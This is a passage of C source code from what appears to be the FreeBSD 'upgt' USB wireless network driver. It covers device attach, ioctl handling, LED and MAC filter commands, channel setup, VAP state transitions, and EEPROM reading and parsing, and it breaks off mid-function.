sc->sc_memaddr_rx_start); upgt_mem_init(sc); /* Load the firmware. */ error = upgt_fw_load(sc); if (error) goto fail5; /* Read the whole EEPROM content and parse it. */ error = upgt_eeprom_read(sc); if (error) goto fail5; error = upgt_eeprom_parse(sc); if (error) goto fail5; /* all works related with the device have done here. */ upgt_abort_xfers(sc); /* Setup the 802.11 device. */ ifp->if_softc = sc; if_initname(ifp, "upgt", device_get_unit(sc->sc_dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = upgt_init; ifp->if_ioctl = upgt_ioctl; ifp->if_start = upgt_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); IFQ_SET_READY(&ifp->if_snd); ic = ifp->if_l2com; ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ ic->ic_opmode = IEEE80211_M_STA; /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode */ | IEEE80211_C_MONITOR /* monitor mode */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_BGSCAN /* capable of bg scanning */ | IEEE80211_C_WPA /* 802.11i */ ; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, sc->sc_myaddr); ic->ic_raw_xmit = upgt_raw_xmit; ic->ic_scan_start = upgt_scan_start; ic->ic_scan_end = upgt_scan_end; ic->ic_set_channel = upgt_set_channel; ic->ic_vap_create = upgt_vap_create; ic->ic_vap_delete = upgt_vap_delete; ic->ic_update_mcast = upgt_update_mcast; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), UPGT_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), UPGT_RX_RADIOTAP_PRESENT); upgt_sysctl_node(sc); if (bootverbose) ieee80211_announce(ic); return (0); fail5: if_free(ifp); fail4: upgt_free_rx(sc); fail3: upgt_free_tx(sc); fail2: usbd_transfer_unsetup(sc->sc_xfer, UPGT_N_XFERS); fail1: mtx_destroy(&sc->sc_mtx); return (error); } static void upgt_txeof(struct usb_xfer *xfer, struct upgt_data *data) { struct upgt_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct mbuf *m; UPGT_ASSERT_LOCKED(sc); /* * Do any tx complete callback. Note this must be done before releasing * the node reference. */ if (data->m) { m = data->m; if (m->m_flags & M_TXCB) { /* XXX status? */ ieee80211_process_callback(data->ni, m, 0); } m_freem(m); data->m = NULL; } if (data->ni) { ieee80211_free_node(data->ni); data->ni = NULL; } ifp->if_opackets++; } static void upgt_get_stats(struct upgt_softc *sc) { struct upgt_data *data_cmd; struct upgt_lmac_mem *mem; struct upgt_lmac_stats *stats; data_cmd = upgt_getbuf(sc); if (data_cmd == NULL) { device_printf(sc->sc_dev, "%s: out of buffer.\n", __func__); return; } /* * Transmit the URB containing the CMD data. */ memset(data_cmd->buf, 0, MCLBYTES); mem = (struct upgt_lmac_mem *)data_cmd->buf; mem->addr = htole32(sc->sc_memaddr_frame_start + UPGT_MEMSIZE_FRAME_HEAD); stats = (struct upgt_lmac_stats *)(mem + 1); stats->header1.flags = 0; stats->header1.type = UPGT_H1_TYPE_CTRL; stats->header1.len = htole16( sizeof(struct upgt_lmac_stats) - sizeof(struct upgt_lmac_header)); stats->header2.reqid = htole32(sc->sc_memaddr_frame_start); stats->header2.type = htole16(UPGT_H2_TYPE_STATS); stats->header2.flags = 0; data_cmd->buflen = sizeof(*mem) + sizeof(*stats); mem->chksum = upgt_chksum_le((uint32_t *)stats, data_cmd->buflen - sizeof(*mem)); upgt_bulk_tx(sc, data_cmd); } static int upgt_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct upgt_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error; int startall = 0; UPGT_LOCK(sc); error = (sc->sc_flags & UPGT_FLAG_DETACHED) ? ENXIO : 0; UPGT_UNLOCK(sc); if (error) return (error); switch (cmd) { case SIOCSIFFLAGS: if (ifp->if_flags & IFF_UP) { if (ifp->if_drv_flags & IFF_DRV_RUNNING) { if ((ifp->if_flags ^ sc->sc_if_flags) & (IFF_ALLMULTI | IFF_PROMISC)) upgt_set_multi(sc); } else { upgt_init(sc); startall = 1; } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) upgt_stop(sc); } sc->sc_if_flags = ifp->if_flags; if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; } static void upgt_stop_locked(struct upgt_softc *sc) { struct ifnet *ifp = sc->sc_ifp; UPGT_ASSERT_LOCKED(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) upgt_set_macfilter(sc, IEEE80211_S_INIT); upgt_abort_xfers_locked(sc); } static void upgt_stop(struct upgt_softc *sc) { struct ifnet *ifp = sc->sc_ifp; UPGT_LOCK(sc); upgt_stop_locked(sc); UPGT_UNLOCK(sc); /* device down */ sc->sc_tx_timer = 0; ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); sc->sc_flags &= ~UPGT_FLAG_INITDONE; } static void upgt_set_led(struct upgt_softc *sc, int action) { struct upgt_data *data_cmd; struct upgt_lmac_mem *mem; struct upgt_lmac_led *led; data_cmd = upgt_getbuf(sc); if (data_cmd == NULL) { device_printf(sc->sc_dev, "%s: out of buffers.\n", __func__); return; } /* * Transmit the URB containing the CMD data. */ memset(data_cmd->buf, 0, MCLBYTES); mem = (struct upgt_lmac_mem *)data_cmd->buf; mem->addr = htole32(sc->sc_memaddr_frame_start + UPGT_MEMSIZE_FRAME_HEAD); led = (struct upgt_lmac_led *)(mem + 1); led->header1.flags = UPGT_H1_FLAGS_TX_NO_CALLBACK; led->header1.type = UPGT_H1_TYPE_CTRL; led->header1.len = htole16( sizeof(struct upgt_lmac_led) - sizeof(struct upgt_lmac_header)); led->header2.reqid = htole32(sc->sc_memaddr_frame_start); led->header2.type = htole16(UPGT_H2_TYPE_LED); led->header2.flags = 0; switch (action) { case UPGT_LED_OFF: led->mode = htole16(UPGT_LED_MODE_SET); led->action_fix = 0; led->action_tmp = htole16(UPGT_LED_ACTION_OFF); led->action_tmp_dur = 0; break; case UPGT_LED_ON: led->mode = htole16(UPGT_LED_MODE_SET); led->action_fix = 0; led->action_tmp = htole16(UPGT_LED_ACTION_ON); led->action_tmp_dur = 0; break; case UPGT_LED_BLINK: if (sc->sc_state != IEEE80211_S_RUN) { STAILQ_INSERT_TAIL(&sc->sc_tx_inactive, data_cmd, next); return; } if (sc->sc_led_blink) { /* previous blink was not finished */ STAILQ_INSERT_TAIL(&sc->sc_tx_inactive, data_cmd, next); return; } led->mode = htole16(UPGT_LED_MODE_SET); led->action_fix = htole16(UPGT_LED_ACTION_OFF); led->action_tmp = htole16(UPGT_LED_ACTION_ON); led->action_tmp_dur = htole16(UPGT_LED_ACTION_TMP_DUR); /* lock blink */ sc->sc_led_blink = 1; callout_reset(&sc->sc_led_ch, hz, upgt_set_led_blink, sc); break; default: STAILQ_INSERT_TAIL(&sc->sc_tx_inactive, data_cmd, next); return; } data_cmd->buflen = sizeof(*mem) + sizeof(*led); mem->chksum = upgt_chksum_le((uint32_t *)led, data_cmd->buflen - sizeof(*mem)); upgt_bulk_tx(sc, data_cmd); } static void upgt_set_led_blink(void *arg) { struct upgt_softc *sc = arg; /* blink finished, we are ready for a next one */ sc->sc_led_blink = 0; } static void upgt_init(void *priv) { struct upgt_softc *sc = priv; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; UPGT_LOCK(sc); upgt_init_locked(sc); UPGT_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } static void upgt_init_locked(struct upgt_softc *sc) { struct ifnet *ifp = sc->sc_ifp; UPGT_ASSERT_LOCKED(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) upgt_stop_locked(sc); usbd_transfer_start(sc->sc_xfer[UPGT_BULK_RX]); (void)upgt_set_macfilter(sc, IEEE80211_S_SCAN); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; sc->sc_flags |= UPGT_FLAG_INITDONE; callout_reset(&sc->sc_watchdog_ch, hz, upgt_watchdog, sc); } static int upgt_set_macfilter(struct upgt_softc *sc, uint8_t state) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ieee80211_node *ni; struct upgt_data *data_cmd; struct upgt_lmac_mem *mem; struct upgt_lmac_filter *filter; uint8_t broadcast[] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; UPGT_ASSERT_LOCKED(sc); data_cmd = upgt_getbuf(sc); if (data_cmd == NULL) { device_printf(sc->sc_dev, "out of TX buffers.\n"); return (ENOBUFS); } /* * Transmit the URB containing the CMD data. */ memset(data_cmd->buf, 0, MCLBYTES); mem = (struct upgt_lmac_mem *)data_cmd->buf; mem->addr = htole32(sc->sc_memaddr_frame_start + UPGT_MEMSIZE_FRAME_HEAD); filter = (struct upgt_lmac_filter *)(mem + 1); filter->header1.flags = UPGT_H1_FLAGS_TX_NO_CALLBACK; filter->header1.type = UPGT_H1_TYPE_CTRL; filter->header1.len = htole16( sizeof(struct upgt_lmac_filter) - sizeof(struct upgt_lmac_header)); filter->header2.reqid = htole32(sc->sc_memaddr_frame_start); filter->header2.type = htole16(UPGT_H2_TYPE_MACFILTER); filter->header2.flags = 0; switch (state) { case IEEE80211_S_INIT: DPRINTF(sc, UPGT_DEBUG_STATE, "%s: set MAC filter to INIT\n", __func__); filter->type = htole16(UPGT_FILTER_TYPE_RESET); break; case IEEE80211_S_SCAN: DPRINTF(sc, UPGT_DEBUG_STATE, "set MAC filter to SCAN (bssid %s)\n", ether_sprintf(broadcast)); filter->type = htole16(UPGT_FILTER_TYPE_NONE); IEEE80211_ADDR_COPY(filter->dst, sc->sc_myaddr); IEEE80211_ADDR_COPY(filter->src, broadcast); filter->unknown1 = htole16(UPGT_FILTER_UNKNOWN1); filter->rxaddr = htole32(sc->sc_memaddr_rx_start); filter->unknown2 = htole16(UPGT_FILTER_UNKNOWN2); filter->rxhw = htole32(sc->sc_eeprom_hwrx); filter->unknown3 = htole16(UPGT_FILTER_UNKNOWN3); break; case IEEE80211_S_RUN: ni = ieee80211_ref_node(vap->iv_bss); /* XXX monitor mode isn't tested yet. */ if (vap->iv_opmode == IEEE80211_M_MONITOR) { filter->type = htole16(UPGT_FILTER_TYPE_MONITOR); IEEE80211_ADDR_COPY(filter->dst, sc->sc_myaddr); IEEE80211_ADDR_COPY(filter->src, ni->ni_bssid); filter->unknown1 = htole16(UPGT_FILTER_MONITOR_UNKNOWN1); filter->rxaddr = htole32(sc->sc_memaddr_rx_start); filter->unknown2 = htole16(UPGT_FILTER_MONITOR_UNKNOWN2); filter->rxhw = htole32(sc->sc_eeprom_hwrx); filter->unknown3 = htole16(UPGT_FILTER_MONITOR_UNKNOWN3); } else { DPRINTF(sc, UPGT_DEBUG_STATE, "set MAC filter to RUN (bssid %s)\n", ether_sprintf(ni->ni_bssid)); filter->type = htole16(UPGT_FILTER_TYPE_STA); IEEE80211_ADDR_COPY(filter->dst, sc->sc_myaddr); IEEE80211_ADDR_COPY(filter->src, ni->ni_bssid); filter->unknown1 = htole16(UPGT_FILTER_UNKNOWN1); filter->rxaddr = htole32(sc->sc_memaddr_rx_start); filter->unknown2 = htole16(UPGT_FILTER_UNKNOWN2); filter->rxhw = htole32(sc->sc_eeprom_hwrx); filter->unknown3 = htole16(UPGT_FILTER_UNKNOWN3); } ieee80211_free_node(ni); break; default: device_printf(sc->sc_dev, "MAC filter does not know that state\n"); break; } data_cmd->buflen = sizeof(*mem) + sizeof(*filter); mem->chksum = upgt_chksum_le((uint32_t *)filter, data_cmd->buflen - sizeof(*mem)); upgt_bulk_tx(sc, data_cmd); return (0); } static void upgt_setup_rates(struct ieee80211vap *vap, struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct upgt_softc *sc = ifp->if_softc; const struct ieee80211_txparam *tp; /* * 0x01 = OFMD6 0x10 = DS1 * 0x04 = OFDM9 0x11 = DS2 * 0x06 = OFDM12 0x12 = DS5 * 0x07 = OFDM18 0x13 = DS11 * 0x08 = OFDM24 * 0x09 = OFDM36 * 0x0a = OFDM48 * 0x0b = OFDM54 */ const uint8_t rateset_auto_11b[] = { 0x13, 0x13, 0x12, 0x11, 0x11, 0x10, 0x10, 0x10 }; const uint8_t rateset_auto_11g[] = { 0x0b, 0x0a, 0x09, 0x08, 0x07, 0x06, 0x04, 0x01 }; const uint8_t rateset_fix_11bg[] = { 0x10, 0x11, 0x12, 0x13, 0x01, 0x04, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b }; tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; /* XXX */ if (tp->ucastrate == IEEE80211_FIXED_RATE_NONE) { /* * Automatic rate control is done by the device. * We just pass the rateset from which the device * will pickup a rate. */ if (ic->ic_curmode == IEEE80211_MODE_11B) memcpy(sc->sc_cur_rateset, rateset_auto_11b, sizeof(sc->sc_cur_rateset)); if (ic->ic_curmode == IEEE80211_MODE_11G || ic->ic_curmode == IEEE80211_MODE_AUTO) memcpy(sc->sc_cur_rateset, rateset_auto_11g, sizeof(sc->sc_cur_rateset)); } else { /* set a fixed rate */ memset(sc->sc_cur_rateset, rateset_fix_11bg[tp->ucastrate], sizeof(sc->sc_cur_rateset)); } } static void upgt_set_multi(void *arg) { struct upgt_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; if (!(ifp->if_flags & IFF_UP)) return; /* * XXX don't know how to set a device. Lack of docs. Just try to set * IFF_ALLMULTI flag here. */ ifp->if_flags |= IFF_ALLMULTI; } static void upgt_start(struct ifnet *ifp) { struct upgt_softc *sc = ifp->if_softc; struct upgt_data *data_tx; struct ieee80211_node *ni; struct mbuf *m; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; UPGT_LOCK(sc); for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; data_tx = upgt_gettxbuf(sc); if (data_tx == NULL) { IFQ_DRV_PREPEND(&ifp->if_snd, m); break; } ni = (struct ieee80211_node *)m->m_pkthdr.rcvif; m->m_pkthdr.rcvif = NULL; if (upgt_tx_start(sc, m, ni, data_tx) != 0) { STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, data_tx, next); UPGT_STAT_INC(sc, st_tx_inactive); ieee80211_free_node(ni); ifp->if_oerrors++; continue; } sc->sc_tx_timer = 5; } UPGT_UNLOCK(sc); } static int upgt_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct upgt_softc *sc = ifp->if_softc; struct upgt_data *data_tx = NULL; /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { m_freem(m); ieee80211_free_node(ni); return ENETDOWN; } UPGT_LOCK(sc); data_tx = upgt_gettxbuf(sc); if (data_tx == NULL) { ieee80211_free_node(ni); m_freem(m); UPGT_UNLOCK(sc); return (ENOBUFS); } if (upgt_tx_start(sc, m, ni, data_tx) != 0) { STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, data_tx, next); UPGT_STAT_INC(sc, st_tx_inactive); ieee80211_free_node(ni); ifp->if_oerrors++; UPGT_UNLOCK(sc); return (EIO); } UPGT_UNLOCK(sc); sc->sc_tx_timer = 5; return (0); } static void upgt_watchdog(void *arg) { struct upgt_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; if (sc->sc_tx_timer > 0) { if (--sc->sc_tx_timer == 0) { device_printf(sc->sc_dev, "watchdog timeout\n"); /* upgt_init(ifp); XXX needs a process context ? */ ifp->if_oerrors++; return; } callout_reset(&sc->sc_watchdog_ch, hz, upgt_watchdog, sc); } } static uint32_t upgt_mem_alloc(struct upgt_softc *sc) { int i; for (i = 0; i < sc->sc_memory.pages; i++) { if (sc->sc_memory.page[i].used == 0) { sc->sc_memory.page[i].used = 1; return (sc->sc_memory.page[i].addr); } } return (0); } static void upgt_scan_start(struct ieee80211com *ic) { /* do nothing. */ } static void upgt_scan_end(struct ieee80211com *ic) { /* do nothing. */ } static void upgt_set_channel(struct ieee80211com *ic) { struct upgt_softc *sc = ic->ic_ifp->if_softc; UPGT_LOCK(sc); upgt_set_chan(sc, ic->ic_curchan); UPGT_UNLOCK(sc); } static void upgt_set_chan(struct upgt_softc *sc, struct ieee80211_channel *c) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct upgt_data *data_cmd; struct upgt_lmac_mem *mem; struct upgt_lmac_channel *chan; int channel; UPGT_ASSERT_LOCKED(sc); channel = ieee80211_chan2ieee(ic, c); if (channel == 0 || channel == IEEE80211_CHAN_ANY) { /* XXX should NEVER happen */ device_printf(sc->sc_dev, "%s: invalid channel %x\n", __func__, channel); return; } DPRINTF(sc, UPGT_DEBUG_STATE, "%s: channel %d\n", __func__, channel); data_cmd = upgt_getbuf(sc); if (data_cmd == NULL) { device_printf(sc->sc_dev, "%s: out of buffers.\n", __func__); return; } /* * Transmit the URB containing the CMD data. */ memset(data_cmd->buf, 0, MCLBYTES); mem = (struct upgt_lmac_mem *)data_cmd->buf; mem->addr = htole32(sc->sc_memaddr_frame_start + UPGT_MEMSIZE_FRAME_HEAD); chan = (struct upgt_lmac_channel *)(mem + 1); chan->header1.flags = UPGT_H1_FLAGS_TX_NO_CALLBACK; chan->header1.type = UPGT_H1_TYPE_CTRL; chan->header1.len = htole16( sizeof(struct upgt_lmac_channel) - sizeof(struct upgt_lmac_header)); chan->header2.reqid = htole32(sc->sc_memaddr_frame_start); chan->header2.type = htole16(UPGT_H2_TYPE_CHANNEL); chan->header2.flags = 0; chan->unknown1 = htole16(UPGT_CHANNEL_UNKNOWN1); chan->unknown2 = htole16(UPGT_CHANNEL_UNKNOWN2); chan->freq6 = sc->sc_eeprom_freq6[channel]; chan->settings = sc->sc_eeprom_freq6_settings; chan->unknown3 = UPGT_CHANNEL_UNKNOWN3; memcpy(chan->freq3_1, &sc->sc_eeprom_freq3[channel].data, sizeof(chan->freq3_1)); memcpy(chan->freq4, &sc->sc_eeprom_freq4[channel], sizeof(sc->sc_eeprom_freq4[channel])); memcpy(chan->freq3_2, &sc->sc_eeprom_freq3[channel].data, sizeof(chan->freq3_2)); data_cmd->buflen = sizeof(*mem) + sizeof(*chan); mem->chksum = upgt_chksum_le((uint32_t *)chan, data_cmd->buflen - sizeof(*mem)); upgt_bulk_tx(sc, data_cmd); } static struct ieee80211vap * upgt_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct upgt_vap *uvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return NULL; uvp = (struct upgt_vap *) malloc(sizeof(struct upgt_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (uvp == NULL) return NULL; vap = &uvp->vap; /* enable s/w bmiss handling for sta mode */ if (ieee80211_vap_setup(ic, vap, name, unit, opmode, flags | IEEE80211_CLONE_NOBEACONS, bssid, mac) != 0) { /* out of memory */ free(uvp, M_80211_VAP); return (NULL); } /* override state transition machine */ uvp->newstate = vap->iv_newstate; vap->iv_newstate = upgt_newstate; /* setup device rates */ upgt_setup_rates(vap, ic); /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return vap; } static int upgt_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct upgt_vap *uvp = UPGT_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct upgt_softc *sc = ic->ic_ifp->if_softc; /* do it in a process context */ sc->sc_state = nstate; IEEE80211_UNLOCK(ic); UPGT_LOCK(sc); callout_stop(&sc->sc_led_ch); callout_stop(&sc->sc_watchdog_ch); switch (nstate) { case IEEE80211_S_INIT: /* do not accept any frames if the device is down */ (void)upgt_set_macfilter(sc, sc->sc_state); upgt_set_led(sc, UPGT_LED_OFF); break; case IEEE80211_S_SCAN: upgt_set_chan(sc, ic->ic_curchan); break; case IEEE80211_S_AUTH: upgt_set_chan(sc, ic->ic_curchan); break; case IEEE80211_S_ASSOC: break; case IEEE80211_S_RUN: upgt_set_macfilter(sc, sc->sc_state); upgt_set_led(sc, UPGT_LED_ON); break; default: break; } UPGT_UNLOCK(sc); IEEE80211_LOCK(ic); return (uvp->newstate(vap, nstate, arg)); } static void upgt_vap_delete(struct ieee80211vap *vap) { struct upgt_vap *uvp = UPGT_VAP(vap); ieee80211_vap_detach(vap); free(uvp, M_80211_VAP); } static void upgt_update_mcast(struct ifnet *ifp) { struct upgt_softc *sc = ifp->if_softc; upgt_set_multi(sc); } static int upgt_eeprom_parse(struct upgt_softc *sc) { struct upgt_eeprom_header *eeprom_header; struct upgt_eeprom_option *eeprom_option; uint16_t option_len; uint16_t option_type; uint16_t preamble_len; int option_end = 0; /* calculate eeprom options start offset */ eeprom_header = (struct upgt_eeprom_header *)sc->sc_eeprom; preamble_len = le16toh(eeprom_header->preamble_len); eeprom_option = (struct upgt_eeprom_option *)(sc->sc_eeprom + (sizeof(struct upgt_eeprom_header) + preamble_len)); while (!option_end) { /* sanity check */ if (eeprom_option >= (struct upgt_eeprom_option *) (sc->sc_eeprom + UPGT_EEPROM_SIZE)) { return (EINVAL); } /* the eeprom option length is stored in words */ option_len = (le16toh(eeprom_option->len) - 1) * sizeof(uint16_t); option_type = le16toh(eeprom_option->type); /* sanity check */ if (option_len == 0 || option_len >= UPGT_EEPROM_SIZE) return (EINVAL); switch (option_type) { case UPGT_EEPROM_TYPE_NAME: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM name len=%d\n", option_len); break; case UPGT_EEPROM_TYPE_SERIAL: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM serial len=%d\n", option_len); break; case UPGT_EEPROM_TYPE_MAC: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM mac len=%d\n", option_len); IEEE80211_ADDR_COPY(sc->sc_myaddr, eeprom_option->data); break; case UPGT_EEPROM_TYPE_HWRX: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM hwrx len=%d\n", option_len); upgt_eeprom_parse_hwrx(sc, eeprom_option->data); break; case UPGT_EEPROM_TYPE_CHIP: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM chip len=%d\n", option_len); break; case UPGT_EEPROM_TYPE_FREQ3: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM freq3 len=%d\n", option_len); upgt_eeprom_parse_freq3(sc, eeprom_option->data, option_len); break; case UPGT_EEPROM_TYPE_FREQ4: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM freq4 len=%d\n", option_len); upgt_eeprom_parse_freq4(sc, eeprom_option->data, option_len); break; case UPGT_EEPROM_TYPE_FREQ5: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM freq5 len=%d\n", option_len); break; case UPGT_EEPROM_TYPE_FREQ6: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM freq6 len=%d\n", option_len); upgt_eeprom_parse_freq6(sc, eeprom_option->data, option_len); break; case UPGT_EEPROM_TYPE_END: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM end len=%d\n", option_len); option_end = 1; break; case UPGT_EEPROM_TYPE_OFF: DPRINTF(sc, UPGT_DEBUG_FW, "%s: EEPROM off without end option\n", __func__); return (EIO); default: DPRINTF(sc, UPGT_DEBUG_FW, "EEPROM unknown type 0x%04x len=%d\n", option_type, option_len); break; } /* jump to next EEPROM option */ eeprom_option = (struct upgt_eeprom_option *) (eeprom_option->data + option_len); } return (0); } static void upgt_eeprom_parse_freq3(struct upgt_softc *sc, uint8_t *data, int len) { struct upgt_eeprom_freq3_header *freq3_header; struct upgt_lmac_freq3 *freq3; int i; int elements; int flags; unsigned channel; freq3_header = (struct upgt_eeprom_freq3_header *)data; freq3 = (struct upgt_lmac_freq3 *)(freq3_header + 1); flags = freq3_header->flags; elements = freq3_header->elements; DPRINTF(sc, UPGT_DEBUG_FW, "flags=0x%02x elements=%d\n", flags, elements); if (elements >= (int)(UPGT_EEPROM_SIZE / sizeof(freq3[0]))) return; for (i = 0; i < elements; i++) { channel = ieee80211_mhz2ieee(le16toh(freq3[i].freq), 0); if (channel >= IEEE80211_CHAN_MAX) continue; sc->sc_eeprom_freq3[channel] = freq3[i]; DPRINTF(sc, UPGT_DEBUG_FW, "frequence=%d, channel=%d\n", le16toh(sc->sc_eeprom_freq3[channel].freq), channel); } } void upgt_eeprom_parse_freq4(struct upgt_softc *sc, uint8_t *data, int len) { struct upgt_eeprom_freq4_header *freq4_header; struct upgt_eeprom_freq4_1 *freq4_1; struct upgt_eeprom_freq4_2 *freq4_2; int i; int j; int elements; int settings; int flags; unsigned channel; freq4_header = (struct upgt_eeprom_freq4_header *)data; freq4_1 = (struct upgt_eeprom_freq4_1 *)(freq4_header + 1); flags = freq4_header->flags; elements = freq4_header->elements; settings = freq4_header->settings; /* we need this value later */ sc->sc_eeprom_freq6_settings = freq4_header->settings; DPRINTF(sc, UPGT_DEBUG_FW, "flags=0x%02x elements=%d settings=%d\n", flags, elements, settings); if (elements >= (int)(UPGT_EEPROM_SIZE / sizeof(freq4_1[0]))) return; for (i = 0; i < elements; i++) { channel = ieee80211_mhz2ieee(le16toh(freq4_1[i].freq), 0); if (channel >= IEEE80211_CHAN_MAX) continue; freq4_2 = (struct upgt_eeprom_freq4_2 *)freq4_1[i].data; for (j = 0; j < settings; j++) { sc->sc_eeprom_freq4[channel][j].cmd = freq4_2[j]; sc->sc_eeprom_freq4[channel][j].pad = 0; } DPRINTF(sc, UPGT_DEBUG_FW, "frequence=%d, channel=%d\n", le16toh(freq4_1[i].freq), channel); } } void upgt_eeprom_parse_freq6(struct upgt_softc *sc, uint8_t *data, int len) { struct upgt_lmac_freq6 *freq6; int i; int elements; unsigned channel; freq6 = (struct upgt_lmac_freq6 *)data; elements = len / sizeof(struct upgt_lmac_freq6); DPRINTF(sc, UPGT_DEBUG_FW, "elements=%d\n", elements); if (elements >= (int)(UPGT_EEPROM_SIZE / sizeof(freq6[0]))) return; for (i = 0; i < elements; i++) { channel = ieee80211_mhz2ieee(le16toh(freq6[i].freq), 0); if (channel >= IEEE80211_CHAN_MAX) continue; sc->sc_eeprom_freq6[channel] = freq6[i]; DPRINTF(sc, UPGT_DEBUG_FW, "frequence=%d, channel=%d\n", le16toh(sc->sc_eeprom_freq6[channel].freq), channel); } } static void upgt_eeprom_parse_hwrx(struct upgt_softc *sc, uint8_t *data) { struct upgt_eeprom_option_hwrx *option_hwrx; option_hwrx = (struct upgt_eeprom_option_hwrx *)data; sc->sc_eeprom_hwrx = option_hwrx->rxfilter - UPGT_EEPROM_RX_CONST; DPRINTF(sc, UPGT_DEBUG_FW, "hwrx option value=0x%04x\n", sc->sc_eeprom_hwrx); } static int upgt_eeprom_read(struct upgt_softc *sc) { struct upgt_data *data_cmd; struct upgt_lmac_mem *mem; struct upgt_lmac_eeprom *eeprom; int block, error, offset; UPGT_LOCK(sc); usb_pause_mtx(&sc->sc_mtx, 100); offset = 0; block = UPGT_EEPROM_BLOCK_SIZE; while (offset < UPGT_EEPROM_SIZE) { DPRINTF(sc, UPGT_DEBUG_FW, "request EEPROM block (offset=%d, len=%d)\n", offset, block); data_cmd = upgt_getbuf(sc); if (data_cmd == NULL) { UPGT_UNLOCK(sc); return (ENOBUFS); } /* * Transmit the URB containing the CMD data. */ memset(data_cmd->buf, 0, MCLBYTES); mem = (struct upgt_lmac_mem *)data_cmd->buf; mem->addr = htole32(sc->sc_memaddr_frame_start + UPGT_MEMSIZE_FRAME_HEAD); eeprom = (struct upgt_lmac_eeprom *)(mem + 1); eeprom->header1.flags = 0; eeprom->header1.type = UPGT_H1_TYPE_CTRL; eeprom->header1.len = htole16(( sizeof(struct upgt_lmac_eeprom) - sizeof(struct upgt_lmac_header)) + block); eeprom->header2.reqid = htole32(sc->sc_memaddr_frame_start); eeprom->header2.type = htole16(UPGT_H2_TYPE_EEPROM); eeprom->header2.flags = 0; eeprom->offset = htole16(offset); eeprom->len = htole16(block); data_cmd->buflen = sizeof(*mem) + sizeof(*eeprom) + block; mem->chksum = upgt_chksum_le((uint32_t *)eeprom, data_cmd->buflen - sizeof(*mem)); upgt_bulk_tx(sc, data_cmd); error = mtx_sleep(sc, &sc->sc_mtx, 0, "eeprom_request", hz); if (error != 0) { device_printf(sc->sc_dev, "timeout while waiting for EEPROM data\n"); UPGT_UNLOCK(sc); return (EIO); } offset += block; if (UPGT_EEPROM_SIZE - offset < block) block = UPGT_EEPROM_SIZE - offset; } UPGT_UNLOCK(sc); return (0); } /* * When a rx data came in the function returns a mbuf and a rssi values. */ static struct mbuf * upgt_rxeof(struct usb_xfer *xfer, struct upgt_data *data, int *rssi) { struct mbuf *m = NULL; struct upgt_softc *sc = usbd_xfer_softc(xfer); struct 